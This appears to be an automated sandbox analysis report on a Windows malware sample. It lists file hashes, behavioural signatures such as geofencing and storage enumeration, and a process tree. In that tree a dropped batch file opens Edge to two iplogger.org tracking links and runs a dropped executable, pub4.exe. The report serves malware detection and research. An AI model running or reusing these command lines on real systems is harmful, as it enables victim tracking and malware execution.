Analysis

  • max time kernel
    36s
  • max time network
    89s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    06-02-2022 13:12

General

  • Target

    45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe

  • Size

    5.7MB

  • MD5

    5d9500398ebb9e211512cac02183eadb

  • SHA1

    6d249f3a6480f359d8a203594f1f199d87dd8b37

  • SHA256

    45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c

  • SHA512

    5f3274446838b01f341f811f4abbf7219bd3b7c136fadbb0ccde3e94e4908ca0bb366db3163a8109869002b6a462cbcb27f1df14e3db8460c34d4414429e64b3

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe
    "C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1qzLu7
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2300
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718
          4⤵
            PID:3648
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/14Ahe7
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4068
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718
            4⤵
              PID:3632
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"
          2⤵
          • Executes dropped EXE
          PID:3500

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

        MD5

        78afdcc28744f3ccc897189551e60a14

        SHA1

        6408c2447363d821dc659254a324456ed16207ec

        SHA256

        ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

        SHA512

        8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat

        MD5

        c25faf98d787b358c72543e7e11917c8

        SHA1

        911d1eb09ba90b071795842089d57d741f959ee3

        SHA256

        86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40

        SHA512

        b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

        MD5

        9d7fb45d27ca947c3de8dfc20a4bfe65

        SHA1

        1669a4eb54494813218d1753b8faa1c6bc88dc0a

        SHA256

        ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5

        SHA512

        2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

        MD5

        9d7fb45d27ca947c3de8dfc20a4bfe65

        SHA1

        1669a4eb54494813218d1753b8faa1c6bc88dc0a

        SHA256

        ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5

        SHA512

        2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558